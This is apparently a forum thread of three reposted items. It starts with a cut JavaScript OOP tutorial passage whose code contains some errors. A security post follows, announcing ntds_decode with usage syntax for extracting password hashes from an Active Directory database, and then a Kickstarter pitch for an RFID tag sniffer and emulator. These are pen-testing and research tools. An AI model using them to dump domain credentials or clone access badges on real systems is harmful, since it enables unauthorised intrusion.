class. So it's much better to acquiring the properties of the Person instead of re-creating those properties. Now lets see how we can do inheritance in JavaScript. function Student(){} //1)Prototype based Inhertance Student.prototype= new Person(); //2)Inhertance throught Object.create Student.prototype=Object.create(Person); var stobj=new Student(); alert(stobj.sayHi()); We can do inheritance in above two ways. 5)Encapsulation Before we learn Encapsulation and Abstraction first we need to know what is data hiding? and who can we achieve it in JavaScript. Date hiding means hiding the data form accessing it out side the scope. For example in Person class and we have Date of Birth(dob) properties and we want to hide it form out side. Let's see how can we do it. function Person(){ //this is private varibale var dob="8 June 2012"; //public properties and functions return{ age:"23", name:"aravind", getDob:function(){ return dob; } } } var pobj=new Person(); //this will get undefined //because it is private to Person console.log(pobj.dob); //Will get dob value we using public //funtion to get private data console.log(pobj.getDob()); Now Encapsulation Means wrapping up of public and private data into a single data unit is called Encapsulation. Above example is one best suites Encapsulation. 6)Abstraction Abstraction means hiding the inner implementation details and showing only outer details. To understand Abstraction we need to understand Abstract and Interface concepts from Java. But we don't have any direct Abstract or Interface in JS. Ok! now in-order to understand abstraction in JavaScript lets take a example form JavaScript library JQuery. In JQuery we will use $("#ele")to select select an element with id ele on a web page. Actually this code calls negative JavaScript code document.getElementById("ele");But we don't need to know that we can happy use the $("#ele") without knowing the inner details of the implementation. 7)Polymorphism The word Polymorphism in OOPs means having more than one form. In JavaScript a Object,Property,Method can have more than one form. Polymorphism is a very cool feature for dynamic binding or late binding. function Person(){ this.sayHI=function(){} }; //This will create Student Class function Student(){}; Student.prototype=new Person(); Student.prototype.sayHI=function(l){ return "Hi! I am a Student"; } //This will create Teacher Object function Teacher(){}; Teacher.prototype=new Person(); Teacher.prototype.sayHI=function(){ return "Hi! I am a Teacher"; } var sObj=new Student(); //This will check if the student //object is instance of Person or not //if not it won't execute our alert code. if (sObj instanceof Person) { alert("Hurry! JavaScript supports OOps"); } Conclusion JavaScript supports Object Oriented Programming(OOP)Concepts. But it may not be the direct way. We need to create some simulation for some concepts. 10 Aug 2013 by aravind buddha at 10:44 PM Sursa:JavaScript Object Oriented Programming(OOP) Tutorial : Techumber
-
[h=1]Active Directory Password Hash Extraction[/h] Just added a tool for offline Active Directory password hash extraction. It has very basic functionality right now but much more is planned. Command line application that runs on Windows only at the moment. ntds_decode -s <FILE> -d <FILE> -m -i -s <FILE> : SYSTEM registry hive -d <FILE> : Active Directory database -m : Machines (omitted by default) -i : Inactive, Locked or Disabled accounts (omitted by default) The SYSTEM registry hive and Active Directory database are from a domain controller. These files are obviously locked so you need to backup using the Volume Shadow Copy Service. The output format is similar to pwdump and only runs on Windows at the moment. LM and NTLM hashes are extracted from active user accounts only. ntds_decode mounts the SYSTEM file so Administrator access is required on the computer you run it on. If you’re an experienced pen tester or Administrator that would like to test this tool, you can grab from here It’s advisable you don’t use the tool unless you know what you’re doing. Source isn’t provided at the moment because it’s too early to release. If you have questions about it, feel free to e-mail the address provided in README.txt Sursa: Active Directory Password Hash Extraction | Insecurety Research
-
RFIDler - A Software Defined RFID Reader/Writer/Emulator RFIDler (RFID Low-frequency Emulater & Reader). An open platform RFID reader/writer/emulator that can operate in the 125-134 KHz range. Software Defined is the buzz-word in RF these days, and we use SDR (Software Defined Radio) in our work as reverse-engineers all the time, with great projects like HackRF and GNU Radio, etc. So when it came to looking at RFID for a recent engagement, we decided to see if we couldn't apply the same thinking to that technology. And guess what? Yes, you can! One of our team, Adam Laurie (aka Code Monkey), has spent many years playing with RFID, and is the author of RFIDIOt, the open-source RFID python software library, so is very familiar with the higher-level challenges associated with these devices. However, a complete understanding of what goes on 'under the hood' is harder to come by, and it was only when he teamed up with Chip Monkey, Zac Franken, who has been hardware hacking and pulling things to bits (and putting them back together so they do something much more fun) since he was big enough to hold a screwdriver, that the full picture started to emerge... The Goal To produce a tool for Low Frequency (125-134Khz) RFID research projects, as well as a cut-down (Lite) version that can be embedded into your own hardware projects. The fully featured version we hope to bring in for around £30.00, and the Lite version for under £20.00. Features We have written extensive firmware which includes a user interface and an API to allow easy use of the system and to allow you to explore, read and emulate a wide range of low frequency RFID tags. Utilise ANY modulation scheme, including bi-directional protocols Write data to tag Read data from tag Emulate tag Sniff conversations between external reader & tag Provide raw as well as decoded data Built-in antenna External antenna connection USB power and user interface TTL interface GPIO interface JTAG interface for programming USB Bootloader for easy firmware updating External CLOCK interface if not using processor External power connector if not using USB The hardware gives you the capability to read/write/emulate more or less any LF tag, but we've also taken the hard work out of most of them by implementing all the tag types we can find in the public domain. These include: EM4102 / Unique Hitag 1/2/S FDX-B (ISO 11784/5 Animal Standard) Q5 T55xx Indala Noralsy HID Prox NXP PCF7931 Texas Instruments VeriChip FlexPass Firmware We have working firmware that proves the concept, and we will continue to develop the code to provide both command line interface and API for end-user applications. This will be posted in a github repository, here: https://github.com/ApertureLabsLtd/RFIDler Hardware The three devices we will produce are: RFIDler-LF-Nekkid - The bare naked circuit board with built-in antenna, ready for you to populate the electronic components yourself. RFIDler-LF-Lite - This is the board with only the low-level RFID communication components, to allow you to incorporate it into your own projects (e.g. controlling it with Arduino, Rasperry-pi, Beagle-Bone etc.), providing GPIO, power and clock interfaces only. Firmware can be ported from (and/or contributed to) the RFIDler repository, or write your own from scratch. RFIDler-LF-Standard - This is the fully populated Low Frequency (125/134KHz) board with on-board processor that can be used as a stand-alone device for research and in-the-field testing etc., providing TTL and USB serial command line and API interfaces as well as raw GPIO, clock and power. Your pledges will help us get this from working prototype to final production run, and incorporate where possible any cool ideas/features that we hadn't thought of, and bring Software Defined RFID to the masses! The challenges we have left to complete are: Processor selection - we've used the Pic32 as a proof-of-concept chip, but there may be others better suited to this kind of application. We will research and test 2 or 3 other chips before making a final decision. Coil design - coils are almost as mysterious as RFID itself, so we need to try various designs to see which on-board and external coils give us the best performance across the target frequency ranges. Final Board Layout - Layout the final boards and send to manufacturing. Further Details Here is Adam's blog entry on the subject: Obviously a Major Malfunction...: RFIDler - An open source Software Defined RFID Reader/Writer/Emulator And here is the prototype: And here we are reading an Indala PSK tag: The logic analyser trace shows that RFIDler is pulsing on the PSK Reader line whenever there is a phase change on the analogue line (the small green pulses are negative, and the large ones positive). All our software has to do is detect those pulses at each bit period, and clock out the data. The 'Bitstream' line shows the software bit value detection in action, as it's being driven by the UBW32 board. The other nice thing we can do in software is monitor the quality of the read: the width of the reader pulse will narrow as the coil goes in and out of the field, and the coils 'de-couple', so we can flag a read error when the pulse gets too narrow. This is important when you're looking at unknown tag types: the manufacturer may have a built-in parity or other data checks so their native reader knows when it's getting a good read, but we don't have the knowledge of the relevant algorithms, so cannot do the same. With this technique, we can easily filter out bad reads that will give us corrupt data. Of course, as well as reading a tag, we want to be the tag, so here we are emulating PSK: and we could do that for any bitrate, modulation scheme or data pattern (within reason), as well as have 2-way conversations (e.g. Hitag2). So that brings us to where we are now... Timeframe We've allowed the following timeframes for each stage: Project starts in October (assuming we get funded! Full circuit design and CPU selection: 4 weeks, taking us to November. Beta test phase: 6 weeks up to mid-December, then it's the Christmas & New Year break... Final production run: 4 weeks starting in January, so we should be done by February. We all know that in real life timescales slip, but since the underlying hardware is already proven in our prototype, and all we're really doing now is fine-tuning and incorporating feedback from the beta test, we expect this to be a fairly quick project! Risks and challenges Learn about accountability on Kickstarter We have great facilities in-house for prototyping electronic circuits, and so we expect the main challenges to have been worked out before we go to the trouble and expense of outside manufacturing. However, we also have a great relationship with our fab company, who we have used for several years on many successful projects, so we know they have the resources to get the job done. We look forward to working with you! FAQ Have a question? If the info above doesn't help, you can ask the project creator directly. Sursa: RFIDler - A Software Defined RFID Reader/Writer/Emulator by Aperture Labs Ltd. — Kickstarter